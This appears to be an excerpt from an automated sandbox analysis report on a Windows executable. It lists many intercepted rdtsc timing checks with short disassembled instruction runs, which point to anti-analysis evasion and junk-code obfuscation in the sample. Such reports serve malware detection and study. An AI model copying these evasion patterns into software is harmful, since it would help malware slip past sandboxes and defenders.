                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C55D second address: F5C56E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2AD900F59Ch 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C56E second address: F5C57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C57B second address: F5C591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A0h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C6BE second address: F5C6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5C996 second address: F5C99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CAEF second address: F5CAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CC5A second address: F5CC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CC62 second address: F5CC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5CC68 second address: F5CC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED996E second address: ED9974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21829 second address: EFE8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 movzx edx, si 0x0000000b call dword ptr [ebp+122D1C15h] 0x00000011 je 00007F2AD900F5D3h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2AD900F5A7h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F218DF second address: F218E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21A14 second address: F21A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21A1E second address: F21A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21C04 second address: F21C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21C09 second address: D618AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2AD9523881h 0x0000000f nop 0x00000010 mov dx, 32F6h 0x00000014 push dword ptr [ebp+122D0E69h] 0x0000001a add di, 03C3h 0x0000001f call dword ptr [ebp+122D37E6h] 0x00000025 pushad 0x00000026 pushad 0x00000027 sub eax, dword ptr [ebp+122D29D0h] 0x0000002d pushad 0x0000002e push edi 0x0000002f pop ebx 0x00000030 popad 0x00000031 popad 0x00000032 xor eax, eax 0x00000034 jmp 00007F2AD952387Ah 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d pushad 0x0000003e add dword ptr [ebp+122D3560h], ecx 0x00000044 popad 0x00000045 mov dword ptr [ebp+122D290Ch], eax 0x0000004b stc 0x0000004c mov esi, 0000003Ch 0x00000051 pushad 0x00000052 add ax, 3242h 0x00000057 mov ebx, dword ptr [ebp+122D2BA8h] 0x0000005d popad 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jmp 00007F2AD952387Ch 0x00000067 lodsw 0x00000069 xor dword ptr [ebp+122D3560h], ecx 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 stc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov dword ptr [ebp+122D2F16h], ebx 0x0000007f mov eax, dword ptr [ebp+122D2C18h] 0x00000085 popad 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007F2AD9523888h 0x0000008e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21DA4 second address: F21E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a xor dword ptr [esp], 29615FE1h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F2AD900F598h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov ecx, 46244F3Eh 0x00000030 sub dword ptr [ebp+122D25D5h], eax 0x00000036 call 00007F2AD900F599h 0x0000003b jo 00007F2AD900F5ACh 0x00000041 push eax 0x00000042 push edi 0x00000043 push eax 0x00000044 jmp 00007F2AD900F59Ch 0x00000049 pop eax 0x0000004a pop edi 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f jp 00007F2AD900F5ACh 0x00000055 mov eax, dword ptr [eax] 0x00000057 pushad 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21E45 second address: F21E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2AD9523887h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21E63 second address: F21E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21E67 second address: F21E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21F46 second address: F21F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21F4A second address: F21F54 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21F54 second address: F21F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F2AD900F596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21F5E second address: F21F75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F2AD952387Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22237 second address: F22290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F2AD900F598h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000004h 0x00000025 jnp 00007F2AD900F597h 0x0000002b nop 0x0000002c jmp 00007F2AD900F5A6h 0x00000031 push eax 0x00000032 je 00007F2AD900F5A0h 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b pop esi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2262F second address: F22635 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22787 second address: F2278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F228F3 second address: F2294C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AD9523887h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F2AD952387Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a jne 00007F2AD9523888h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A08 second address: F22A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A0C second address: F22A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A10 second address: F22A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, 2D66F8C2h 0x0000000c lea eax, dword ptr [ebp+12493578h] 0x00000012 mov ecx, 593D9E86h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jng 00007F2AD900F596h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A34 second address: F22A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2AD9523876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A3F second address: F22A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sub edx, 4A5D2F18h 0x00000010 lea eax, dword ptr [ebp+12493534h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F2AD900F598h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 jnp 00007F2AD900F5A7h 0x00000036 nop 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push edi 0x0000003b pop edi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A91 second address: F22AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2AD9523884h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AAD second address: F22AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AB1 second address: F22AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AC0 second address: F22AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AC5 second address: F22ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22ACA second address: F22AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AD0 second address: EFF4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx ecx, ax 0x0000000b call dword ptr [ebp+122D1A6Bh] 0x00000011 jmp 00007F2AD9523888h 0x00000016 je 00007F2AD952388Eh 0x0000001c jc 00007F2AD952387Eh 0x00000022 push eax 0x00000023 pop eax 0x00000024 jp 00007F2AD9523876h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6102B second address: F61069 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jne 00007F2AD900F596h 0x0000000b pop edi 0x0000000c jng 00007F2AD900F5ACh 0x00000012 jmp 00007F2AD900F59Bh 0x00000017 jmp 00007F2AD900F59Bh 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007F2AD900F5A2h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61069 second address: F6106E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61827 second address: F6182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6182D second address: F61831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61831 second address: F61835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F619BE second address: F619C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65935 second address: F6593B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6593B second address: F65941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65941 second address: F6594C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68A82 second address: F68A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68A86 second address: F68A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68614 second address: F6862D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jnl 00007F2AD952387Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6862D second address: F68631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68768 second address: F68772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68772 second address: F6877C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6877C second address: F6878E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6878E second address: F68794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68794 second address: F687A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F687A4 second address: F687BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F59Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F687BC second address: F687C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6ADBA second address: F6ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA18 second address: F6EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F2AD9523882h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA32 second address: F6EA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA3D second address: F6EA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2AD952387Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E178 second address: F6E184 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2FFF second address: ED3009 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2AD9523876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F72F75 second address: F72F7F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AD900F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F72F7F second address: F72F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F2AD9523876h 0x0000000e js 00007F2AD9523876h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7353B second address: F73574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2AD900F5B3h 0x0000000a jmp 00007F2AD900F59Ch 0x0000000f jmp 00007F2AD900F5A1h 0x00000014 push edx 0x00000015 jl 00007F2AD900F59Eh 0x0000001b push esi 0x0000001c pop esi 0x0000001d jnc 00007F2AD900F596h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2249A second address: F22504 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2AD952387Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D3203h], esi 0x00000011 mov ebx, dword ptr [ebp+12493573h] 0x00000017 mov dword ptr [ebp+122D3333h], ecx 0x0000001d add eax, ebx 0x0000001f mov dx, B3DCh 0x00000023 or ecx, 64A31199h 0x00000029 push eax 0x0000002a jbe 00007F2AD9523880h 0x00000030 pushad 0x00000031 push edx 0x00000032 pop edx 0x00000033 je 00007F2AD9523876h 0x00000039 popad 0x0000003a mov dword ptr [esp], eax 0x0000003d xor dh, 00000022h 0x00000040 push 00000004h 0x00000042 jmp 00007F2AD9523885h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2AD952387Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73881 second address: F73891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F2AD900F596h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73891 second address: F73897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73897 second address: F738AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2AD900F59Ah 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F738AD second address: F738C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F738C7 second address: F738E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2AD900F596h 0x0000000f jc 00007F2AD900F596h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F738E7 second address: F738ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74431 second address: F74435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77B3F second address: F77B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77B49 second address: F77B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2AD900F59Eh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80892 second address: F8089C instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F521 second address: F7F528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FFF5 second address: F80024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2AD9523881h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jo 00007F2AD9523878h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jng 00007F2AD9523876h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80592 second address: F805B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD900F59Fh 0x00000009 jmp 00007F2AD900F5A2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84695 second address: F8469F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2AD9523876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84AF2 second address: F84AFE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84AFE second address: F84B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
